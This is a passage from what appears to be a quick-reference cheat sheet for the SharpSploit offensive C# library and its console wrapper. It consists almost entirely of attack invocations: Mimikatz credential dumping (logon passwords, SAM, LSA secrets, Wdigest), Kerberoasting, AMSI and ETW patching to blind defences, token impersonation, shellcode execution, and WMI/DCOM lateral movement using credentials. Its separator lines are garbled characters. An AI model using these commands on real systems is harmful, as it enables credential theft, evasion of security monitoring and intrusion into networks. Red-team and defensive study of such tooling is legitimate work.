    806 LSA CACHE:          SharpSploitConsole.exe LsaCache
    807 WDIGEST:            SharpSploitConsole.exe Wdigest
    808 MIMI ALL:           SharpSploitConsole.exe Mimi-All
    809 MIMI CUSTOM:        SharpSploitConsole.exe Mimi-Command "<command>"
    810 
    811 KERBEROAST:         SharpSploitConsole.exe Kerberoast
    812 
    813 WMI EXEC:           SharpSploitConsole.exe WMI <host> <user> <pass> <cmd>
    814 DCOM EXEC:          SharpSploitConsole.exe DCOM <host> <cmd> <dir> <params>
    815 
    816 NET LOCAL GROUPS:   SharpSploitConsole.exe NetLocalGroups <host> <user> <pass>
    817 NET GROUP MEMBERS:  SharpSploitConsole.exe NetLocalGroupMembers <host> <group> <user> <pass>
    818 NET LOGGED ON:      SharpSploitConsole.exe NetLoggedOnUsers <host> <user> <pass>
    819 NET SESSIONS:       SharpSploitConsole.exe NetSessions <host> <user> <pass>
    820 
    821 โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    822   SHARPSPLOIT LIBRARY QUICK REFERENCE (C# CODE)
    823 โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
    824 
    825 PATCH AMSI:         Amsi.PatchAmsiScanBuffer();
    826 PATCH ETW:          Etw.PatchEtw();
    827 
    828 LOGON PASSWORDS:    Mimikatz.LogonPasswords();
    829 SAM DUMP:           Mimikatz.SamDump();
    830 LSA SECRETS:        Mimikatz.LsaSecrets();
    831 MIMI COMMAND:       Mimikatz.Command("<command>");
    832 
    833 GET SYSTEM:         tokens.GetSystem();
    834 IMPERSONATE USER:   tokens.ImpersonateUser("DOMAIN\\User");
    835 MAKE TOKEN:         tokens.MakeToken("DOMAIN\\User", "password");
    836 REVERT:             tokens.RevertToSelf();
    837 
    838 SHELL CMD:          Shell.ShellExecute("<command>");
    839 POWERSHELL:         Shell.PowerShellExecute("<command>");
    840 LOAD ASSEMBLY:      Assembly.AssemblyExecute(bytes, args);
    841 SHELLCODE:          ShellCode.ShellCodeExecute(bytes);
    842 
    843 DOMAIN USERS:       Domain.GetDomainUsers();
    844 DOMAIN GROUPS:      Domain.GetDomainGroups();
    845 DOMAIN COMPUTERS:   Domain.GetDomainComputers();
    846 LDAP SEARCH:        Domain.LDAPSearch("<filter>", "<searchBase>");
    847 
    848 WMI EXEC:           WMI.WMIExecute("host", "cmd", "user", "pass");
    849 DCOM EXEC:          DCOM.DCOMExecute("host", "cmd", "dir");
    850 
    851 PROCESS LIST:       Host.GetProcessList();
    852 READ FILE:          Host.ReadFile("path");
    853 HOSTNAME:           Host.GetHostname();
    854 ```
    855 
    856 ---
    857 
    858 > **Sources:** SharpSploit GitHub (cobbr/SharpSploit) | SharpSploitConsole GitHub (anthemtotheego/SharpSploitConsole) | SpecterOps Blog | SharpSploit API Docs (sharpsploit.cobbr.io)